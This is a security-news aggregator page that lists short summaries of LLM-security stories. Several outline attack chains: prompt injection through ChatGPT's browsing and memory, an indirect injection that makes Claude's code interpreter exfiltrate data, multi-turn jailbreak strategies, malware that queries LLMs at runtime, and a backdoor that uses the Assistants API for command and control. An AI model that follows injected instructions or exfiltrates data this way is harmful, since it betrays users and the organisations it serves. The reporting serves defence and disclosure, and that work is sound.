< ciso
brief />
Tag Banner

All news with #llm security tag

250 articles · page 10 of 13

Researchers Trick ChatGPT into Self Prompt Injection

🔒 Researchers at Tenable identified seven techniques that can coerce ChatGPT into disclosing private chat history by abusing built-in features like web browsing and long-term Memories. They show how OpenAI’s browsing pipeline routes pages through a weaker intermediary model, SearchGPT, which can be prompt-injected and then used to seed malicious instructions back into ChatGPT. Proof-of-concepts include exfiltration via Bing-tracked URLs, Markdown image loading, and a rendering quirk, and Tenable says some issues remain despite reported fixes.
read more →

Microsoft Reveals Whisper Leak: Streaming LLM Side-Channel

🔒 Microsoft has disclosed a novel side-channel called Whisper Leak that can let a passive observer infer the topic of conversations with streaming language models by analyzing encrypted packet sizes and timings. Researchers at Microsoft (Bar Or, McDonald and the Defender team) demonstrate classifiers that distinguish targeted topics from background traffic with high accuracy across vendors including OpenAI, Mistral and xAI. Providers have deployed mitigations such as random-length response padding; Microsoft recommends avoiding sensitive topics on untrusted networks, using VPNs, or preferring non-streaming models and providers that implemented fixes.
read more →

Whisper Leak: Side-Channel Attack on Remote LLM Services

🔍 Microsoft researchers disclosed "Whisper Leak", a new side-channel that can infer conversation topics from encrypted, streamed language model responses by analyzing packet sizes and timings. The study demonstrates high classifier accuracy on a proof-of-concept sensitive topic and shows risk increases with more training data or repeated interactions. Industry partners including OpenAI, Mistral, Microsoft Azure, and xAI implemented streaming obfuscation mitigations that Microsoft validated as substantially reducing practical risk.
read more →

Remember, Remember: AI Agents, Threat Intel, and Phishing

🔔 This edition of the Threat Source newsletter opens with Bonfire Night and the 1605 Gunpowder Plot as a narrative hook, tracing how Guy Fawkes' image became a symbol of protest and hacktivism. It spotlights Cisco Talos research, including a new Incident Response report and a notable internal phishing case where compromised O365 accounts abused inbox rules to hide malicious activity. The newsletter also features a Tool Talk demonstrating a proof-of-concept that equips autonomous AI agents with real-time threat intelligence via LangChain, OpenAI, and the Cisco Umbrella API to improve domain trust decisions.
read more →

Multi-Turn Adversarial Attacks Expose LLM Weaknesses

🔍 Cisco AI Defense's report shows open-weight large language models remain vulnerable to adaptive, multi-turn adversarial attacks even when single-turn defenses appear effective. Using over 1,000 prompts per model and analyzing 499 simulated conversations of 5–10 exchanges, researchers found iterative strategies such as Crescendo, Role-Play and Refusal Reframe drove failure rates above 90% in many cases. The study warns that traditional safety filters are insufficient and recommends strict system prompts, model-agnostic runtime guardrails and continuous red-teaming to mitigate risk.
read more →

AI-Powered Malware Emerges: Google Details New Threats

🛡️ Google Threat Intelligence Group (GTIG) reports that cybercriminals are actively integrating large language models into malware campaigns, moving beyond mere tooling to generate, obfuscate, and adapt malicious code. GTIG documents new families — including PROMPTSTEAL, PROMPTFLUX, FRUITSHELL, and PROMPTLOCK — that query commercial APIs to produce or rewrite payloads and evade detection. Researchers also note attackers use social‑engineering prompts to trick LLMs into revealing sensitive guidance and that underground marketplaces increasingly offer AI-enabled “malware-as-a-service,” lowering the bar for less skilled threat actors.
read more →

Google Warns: AI-Enabled Malware Actively Deployed

⚠️ Google’s Threat Intelligence Group has identified a new class of AI-enabled malware that leverages large language models at runtime to generate and obfuscate malicious code. Notable families include PromptFlux, which uses the Gemini API to rewrite its VBScript dropper for persistence and lateral spread, and PromptSteal, a Python data miner that queries Qwen2.5-Coder-32B-Instruct to create on-demand Windows commands. GTIG observed PromptSteal used by APT28 in Ukraine, while other examples such as PromptLock, FruitShell and QuietVault demonstrate varied AI-driven capabilities. Google warns this "just-in-time AI" approach could accelerate malware sophistication and democratize cybercrime.
read more →

Google: LLMs Employed Operationally in Malware Attacks

🤖 Google’s Threat Intelligence Group (GTIG) reports attackers are using “just‑in‑time” AI—LLMs queried during execution—to generate and obfuscate malicious code. Researchers identified two families, PROMPTSTEAL and PROMPTFLUX, which query Hugging Face and Gemini APIs to craft commands, rewrite source code, and evade detection. GTIG also documents social‑engineering prompts that trick models into revealing red‑teaming or exploit details, and warns the underground market for AI‑enabled crime is maturing. Google says it has disabled related accounts and applied protections.
read more →

Google: New AI-Powered Malware Families Deployed

⚠️Google's Threat Intelligence Group reports a surge in malware that integrates large language models to enable dynamic, mid-execution changes—what Google calls "just-in-time" self-modification. Notable examples include the experimental PromptFlux VBScript dropper and the PromptSteal data miner, plus operational threats like FruitShell and QuietVault. Google disabled abused Gemini accounts, removed assets, and is hardening model safeguards while collaborating with law enforcement.
read more →

Lack of AI Training Becoming a Major Security Risk

⚠️ A majority of German employees already use AI at work, with 62% reporting daily use of generative tools such as ChatGPT. Adoption has been largely grassroots—31% began using AI independently and nearly half learned via videos or informal study. Although 85% deem training on AI and data protection essential, 25% report no security training and 47% received only informal guidance, leaving clear operational and data risks.
read more →

SesameOp Backdoor Abuses OpenAI Assistants API for C2

🛡️ Researchers at Microsoft disclosed a previously undocumented backdoor, dubbed SesameOp, that abuses the OpenAI Assistants API to relay commands and exfiltrate results. The attack chain uses .NET AppDomainManager injection to load obfuscated libraries (loader "Netapi64.dll") into developer tools and relies on a hard-coded API key to pull payloads from assistant descriptions. Because traffic goes to api.openai.com, the campaign evaded traditional C2 detection. Microsoft Defender detections and account key revocation were used to disrupt the operation.
read more →

AI Summarization Optimization Reshapes Meeting Records

📝 AI notetakers are increasingly treated as authoritative meeting participants, and attendees are adapting speech to influence what appears in summaries. This practice—called AI summarization optimization (AISO)—uses cue phrases, repetition, timing, and formulaic framing to steer models toward including selected facts or action items. The essay outlines evidence of model vulnerability and recommends social, organizational, and technical defenses to preserve trustworthy records.
read more →

OpenAI Unveils Aardvark: GPT-5 Agent for Code Security

🔍 OpenAI has introduced Aardvark, an agentic security researcher powered by GPT-5 that autonomously scans source code repositories to identify vulnerabilities, assess exploitability, and propose targeted patches that can be reviewed by humans. Embedded in development pipelines, the agent monitors commits and incoming changes continuously, prioritizes threats by severity and likely impact, and attempts controlled exploit verification in sandboxed environments. Using OpenAI Codex for patch generation, Aardvark is in private beta and has already contributed to the discovery of multiple CVEs in open-source projects.
read more →

Claude code interpreter flaw allows stealthy data theft

🔒 A newly disclosed vulnerability in Anthropic’s Claude AI lets attackers manipulate the model’s code interpreter to silently exfiltrate enterprise data. Researcher Johann Rehberger demonstrated an indirect prompt-injection chain that writes sensitive context to the interpreter sandbox and then uploads files using the attacker’s API key to Anthropic’s Files API. The exploit exploits the default “Package managers only” network setting by leveraging access to api.anthropic.com, so exfiltration blends with legitimate API traffic. Mitigations are limited and may significantly reduce functionality.
read more →

Five Generative AI Security Threats and Defensive Steps

🔒 Microsoft summarizes the top generative AI security risks and mitigation strategies in a new e-book, highlighting threats such as prompt injection, data poisoning, jailbreaks, and adaptive evasion. The post underscores cloud vulnerabilities, large-scale data exposure, and unpredictable model behavior that create new attack surfaces. It recommends unified defenses—such as CNAPP approaches—and presents Microsoft Defender for Cloud as an example that combines posture management with runtime detection to protect AI workloads.
read more →

Open-Source b3 Benchmark Boosts LLM Security Testing

🛡️ The UK AI Security Institute (AISI), Check Point and Lakera have launched b3, an open-source benchmark to assess and strengthen the security of backbone LLMs that power AI agents. b3 focuses on the specific LLM calls within agent workflows where malicious inputs can trigger harmful outputs, using 10 representative "threat snapshots" combined with a dataset of 19,433 adversarial attacks from Lakera’s Gandalf initiative. The benchmark surfaces vulnerabilities such as system prompt exfiltration, phishing link insertion, malicious code injection, denial-of-service and unauthorized tool calls, making LLM security more measurable, reproducible and comparable across models and applications.
read more →

Check Point's AI Cloud Protect with NVIDIA BlueField

🔒 Check Point has made AI Cloud Protect powered by NVIDIA BlueField available for enterprise deployment, offering DPU-accelerated security for cloud AI workloads. The solution aims to inspect and protect GenAI traffic and prompts to reduce data exposure risks while integrating with existing cloud environments. It targets prompt manipulation and infrastructure attacks at scale and is positioned for organizations building AI factories.
read more →

Manipulating Meeting Notetakers: AI Summarization Risks

📝 In many organizations the most consequential meeting attendee is the AI notetaker, whose summaries often become the authoritative meeting record. Participants can tailor their speech—using cue phrases, repetition, timing, and formulaic phrasing—to increase the chance their points appear in summaries, a behavior the author calls AI summarization optimization (AISO). These tactics mirror SEO-style optimization and exploit model tendencies to overweight early or summary-style content. Without governance and technical safeguards, summaries may misrepresent debate and confer an invisible advantage to those who game the system.
read more →

ChatGPT Atlas Signals Shift Toward AI Operating Systems

🤖 ChatGPT Atlas previews a future where AI becomes the primary interface for computing, letting users describe outcomes while the system orchestrates apps, data, and web services. Atlas demonstrates an context-aware assistant that understands a user’s digital life and can act on their behalf. This prototype points to productivity and accessibility gains, but it also creates new security, privacy, and governance challenges organizations must prepare for.
read more →

Model Armor and Apigee: Protecting Generative AI Apps

🔒 Google Cloud’s Model Armor integrates with Apigee to screen prompts, responses, and agent interactions, helping organizations mitigate prompt injection, jailbreaks, sensitive data exposure, malicious links, and harmful content. The model‑agnostic, cloud‑agnostic service supports REST APIs and inline integrations with Apigee, Vertex AI, Agentspace, and network service extensions. The article provides step‑by‑step setup: enable the API, create templates, assign service account roles, add SanitizeUserPrompt and SanitizeModelResponse policies to Apigee proxies, and review findings in the AI Protection dashboard.
read more →